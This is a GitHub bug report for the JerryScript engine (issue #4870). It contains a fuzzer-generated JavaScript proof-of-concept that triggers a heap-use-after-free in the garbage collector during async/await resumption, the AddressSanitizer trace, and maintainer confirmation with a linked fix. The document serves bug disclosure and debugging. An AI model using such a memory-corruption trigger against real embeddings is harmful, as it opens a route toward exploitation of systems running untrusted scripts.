

AddressSanitizer: heap-use-after-free jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited #4870

Open
eternalsakura opened this issue Dec 9, 2021 · 5 comments · May be fixed by #4966

@eternalsakura

JerryScript commit hash

55acdf2

Build platform

Ubuntu 20.04 LTS

Build steps

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

Proof of concept (fuzzer-generated reproducer)

// Reproducer for issue #4870: heap-use-after-free in ecma_gc_set_object_visited
// (jerry-core/ecma/base/ecma-gc.c:90).
//
// What the attached ASan report establishes (see its three stacks):
//  - The invalid 4-byte read happens inside a GC run (ecma_gc_run -> ecma_gc_mark
//    -> ecma_gc_mark_executable_object), i.e. while the collector is marking a
//    suspended executable object. That GC is triggered by an allocation made from
//    ecma_promise_async_await (the `await` machinery) while a suspended async
//    frame is being resumed from the job queue (jerry_run_jobs ->
//    ecma_process_promise_async_reaction_job -> opfunc_resume_executable_object).
//  - The freed 24-byte region was collected by an earlier GC, also triggered from
//    ecma_promise_async_await.
//  - That region was originally allocated by ecma_op_to_object under the `Object`
//    constructor, called from vm_execute inside an Array.prototype.map callback,
//    with a second map frame further down the stack (f re-entered through map).
//    The only `new Object(...)` in this script is on the `arr["map"](f, ...)` line
//    below, so the victim is most likely the Boolean wrapper created there.
//  - NOTE(review): the symptom looks like the suspended async frame still refers
//    to that object without keeping it alive across a GC; the actual root cause is
//    not visible from this page -- see the fix referenced on the issue (#4966).
//
// Security relevance: a GC mark-phase read of freed memory is memory corruption
// reachable from script alone. In an embedding that runs untrusted JavaScript this
// should be treated as potentially exploitable until the fix is in place.
//
// Build note: the report was produced with --system-allocator=on, so every engine
// object is an individual malloc'd region and ASan can attribute the alloc/free
// stacks. With JerryScript's own arena allocator the same bug would presumably be
// silent (not verified), so keep that flag when trying to reproduce.
//
// Do not "tidy" this function: the order, count and kind of allocations between
// the awaits drive the GC into the bad state, and the reporter notes that
// automated test reduction did not work well.
async function f() {
    let arr = [0.000000];
    let fuzz_v152 = arr;
    let fuzz_v159 = fuzz_v152.__proto__;
    // A generator function: assigning it as valueOf does not run its body (the
    // `while (arr) {}` inside is never executed unless the generator is iterated).
    fuzz_v152.valueOf = function* (fuzz_v166, fuzz_v167) {
        while (arr) {
        }
        var fuzz_v172 = ~f;
        arr >>= [1.100000];
        return fuzz_v167;
    };
    arr.includes(arr, [340282346638528859811704183484516925440.000000], arr);
    delete [10];
    let fuzz_v253 = f.__proto__;
    let fuzz_v256 = {
        "D5FP8": f
    };
    // Re-enters f synchronously from inside map (an async function runs up to its
    // first await before returning), with the Boolean wrapper `new Object(true)`
    // as the callback's `this`. The "previously allocated by" stack in the ASan
    // report (Object construct <- vm_execute <- ... <- array map) points here.
    arr["map"](f, new Object(true));
    arr.flat();
    let fuzz_v69 = false;
    // First suspension point. In the nested invocation started by map, `this` is
    // the wrapper object created above.
    await this;
    await f;
    var fuzz_v43 = arr -= new Date(new String({
        "findIndex": arr
    }));
    await this;
    // NOTE(review): Symbol.reject is not a standard function, so this call should
    // throw a TypeError and reject f's promise; everything after it is probably
    // never reached. Useful as a reduction hint, but not verified against the
    // engine build above.
    let fuzz_v286 = Symbol.reject();
    await f;
    await new Promise(f);
    // The executor is an async generator function; calling it only creates a
    // generator object, so its body is not run by the Promise constructor.
    await new Promise(async function* (fuzz_v80) {
        var fuzz_v82 = new Uint32Array(fuzz_v80, arr, [1.100000], fuzz_v80, fuzz_v80);
        let fuzz_v96 = fuzz_v82.__proto__;
        this.length = 4;
    });
    await new Promise(async function* (fuzz_v138, fuzz_v139) {
        fuzz_v138.__proto__ = fuzz_v139;
        let fuzz_v147 = function* (fuzz_v149, fuzz_v150, fuzz_v151, fuzz_v152) {
            let fuzz_v165 = Reflect.apply(fuzz_v152, {
                "findIndex": fuzz_v150
            }, [{}]);
            switch ({
                    includes: fuzz_v138,
                    set valueOf(fuzz_v175) {
                        fuzz_v150.valueOf = fuzz_v175;
                        return;
                    }
                }) {
            case [1.100000]:
                throw arr;
                break;
            case 5643033980980220.000000:
                let fuzz_v203 = String.prototype.trim.call(new String());
                break;
            default:
                fuzz_v43.valueOf = fuzz_v150;
            }
            let fuzz_v214 = fuzz_v69;
            let fuzz_v223 = Number.isInteger(2147483648);
        };
        var fuzz_v228 = f;
        delete f.__proto__;
        let fuzz_v237 = {};
    });
    await new Promise(f);
    await new Promise(async function* (fuzz_v269, fuzz_v270, fuzz_v271) {
        class fuzz_class273 extends f {

        }
        return arr;
    });
    await new Promise(fuzz_v286);
}
f(f, f);

ASan log (32-bit build, system allocator)

=================================================================
==2066102==ERROR: AddressSanitizer: heap-use-after-free on address 0xf4e01ba0 at pc 0x565c19c2 bp 0xffdeb558 sp 0xffdeb548
READ of size 4 at 0xf4e01ba0 thread T0
    #0 0x565c19c1 in ecma_gc_set_object_visited /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:90
    #1 0x565c474d in ecma_gc_mark_executable_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:698
    #2 0x565c5bc0 in ecma_gc_mark /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:1007
    #3 0x565c9a46 in ecma_gc_run /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2209
    #4 0x565ca303 in ecma_free_unused_memory /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2321
    #5 0x5666230f in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:285
    #6 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #7 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #8 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #9 0x56628895 in ecma_op_create_native_handler /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:716
    #10 0x56641987 in ecma_promise_create_resolving_function /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:425
    #11 0x56641aa5 in ecma_promise_run_executor /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:446
    #12 0x56641df2 in ecma_op_create_promise_object /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:516
    #13 0x56642f01 in ecma_promise_new_capability /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:766
    #14 0x56643310 in ecma_promise_reject_or_resolve /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:844
    #15 0x566442cc in ecma_promise_async_await /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:1183
    #16 0x566c2274 in vm_loop /home/sakura/jerryscript/jerry-core/vm/vm.c:2742
    #17 0x566d4684 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5260
    #18 0x566a8627 in opfunc_resume_executable_object /home/sakura/jerryscript/jerry-core/vm/opcodes.c:777
    #19 0x56630503 in ecma_process_promise_async_reaction_job /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:365
    #20 0x566311f0 in ecma_process_all_enqueued_jobs /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:569
    #21 0x565b1569 in jerry_run_jobs /home/sakura/jerryscript/jerry-core/api/jerryscript.c:1064
    #22 0x565a899d in main /home/sakura/jerryscript/jerry-main/main-jerry.c:326
    #23 0xf75ecee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
    #24 0x565a6b04 in _start (/home/sakura/jerryscript/build2/bin/jerry+0x22b04)

0xf4e01ba0 is located 0 bytes inside of 24-byte region [0xf4e01ba0,0xf4e01bb8)
freed by thread T0 here:
    #0 0xf79d5814 in __interceptor_free (/lib32/libasan.so.5+0x113814)
    #1 0x566625d9 in jmem_heap_free_block_internal /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:477
    #2 0x56662a7d in jmem_heap_free_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:691
    #3 0x566d4f02 in ecma_dealloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:125
    #4 0x565c9451 in ecma_gc_free_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2150
    #5 0x565ca0cb in ecma_gc_run /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2277
    #6 0x565ca303 in ecma_free_unused_memory /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2321
    #7 0x5666230f in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:285
    #8 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #9 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #10 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #11 0x56642ca0 in ecma_promise_new_capability /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:742
    #12 0x56643310 in ecma_promise_reject_or_resolve /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:844
    #13 0x566442cc in ecma_promise_async_await /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:1183
    #14 0x566c2274 in vm_loop /home/sakura/jerryscript/jerry-core/vm/vm.c:2742
    #15 0x566d4684 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5260
    #16 0x566a8627 in opfunc_resume_executable_object /home/sakura/jerryscript/jerry-core/vm/opcodes.c:777
    #17 0x56630503 in ecma_process_promise_async_reaction_job /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:365
    #18 0x566311f0 in ecma_process_all_enqueued_jobs /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:569
    #19 0x565b1569 in jerry_run_jobs /home/sakura/jerryscript/jerry-core/api/jerryscript.c:1064
    #20 0x565a899d in main /home/sakura/jerryscript/jerry-main/main-jerry.c:326
    #21 0xf75ecee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)

previously allocated by thread T0 here:
    #0 0xf79d5c17 in __interceptor_malloc (/lib32/libasan.so.5+0x113c17)
    #1 0x5666221f in jmem_heap_alloc /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:254
    #2 0x5666231d in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:291
    #3 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #4 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #5 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #6 0x56622394 in ecma_op_to_object /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:581
    #7 0x566fc246 in ecma_builtin_object_dispatch_call /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-object.c:116
    #8 0x566fc375 in ecma_builtin_object_dispatch_construct /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-object.c:144
    #9 0x56604101 in ecma_builtin_dispatch_construct /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1603
    #10 0x5662b36d in ecma_op_function_construct_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1585
    #11 0x5662b9ba in ecma_op_function_construct /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1773
    #12 0x566b454b in opfunc_construct /home/sakura/jerryscript/jerry-core/vm/vm.c:845
    #13 0x566d472a in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5287
    #14 0x566d4d4f in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363
    #15 0x5662a0e2 in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #16 0x5662af15 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #17 0x566dc7b8 in ecma_builtin_array_prototype_object_map /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1979
    #18 0x566e0794 in ecma_builtin_array_prototype_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:3006
    #19 0x56603c36 in ecma_builtin_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #20 0x56603e53 in ecma_builtin_dispatch_call /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #21 0x5662a353 in ecma_op_function_call_native_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1244
    #22 0x5662af31 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #23 0x5662ada6 in ecma_op_function_validated_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1402
    #24 0x566b3fb3 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763
    #25 0x566d46e9 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266
    #26 0x566d4d4f in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363
    #27 0x5662a0e2 in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #28 0x5662af15 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #29 0x566dc7b8 in ecma_builtin_array_prototype_object_map /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1979

SUMMARY: AddressSanitizer: heap-use-after-free /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited
Shadow bytes around the buggy address:
  0x3e9c0320: 00 00 00 fa fa fa fd fd fd fd fa fa fd fd fd fa
  0x3e9c0330: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x3e9c0340: fd fd fa fa fd fd fd fa fa fa 00 00 00 fa fa fa
  0x3e9c0350: 00 00 00 fa fa fa fd fd fd fd fa fa 00 00 00 fa
  0x3e9c0360: fa fa 00 00 00 fa fa fa fd fd fd fd fa fa fd fd
=>0x3e9c0370: fd fa fa fa[fd]fd fd fa fa fa 00 00 00 fa fa fa
  0x3e9c0380: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
  0x3e9c0390: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x3e9c03a0: fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x3e9c03b0: fd fd fd fd fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x3e9c03c0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2066102==ABORTING

@eternalsakura
Author

Can you confirm if this is a valid issue? thanks :)

@rerobika
Member

rerobika commented Dec 9, 2021

Yep, that's a valid issue.

@rerobika rerobika added the bug Undesired behaviour label Dec 9, 2021
@rerobika
Member

rerobika commented Dec 9, 2021

However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

@eternalsakura
Author

However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

I have already tried to reduce this PoC, but it did not work well.

I will think of some other ways, and I will communicate with you if I have gained something.

@hope-fly

hope-fly commented Dec 9, 2021

@rerobika OK, I'll take a look tomorrow.

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu
mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu
mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu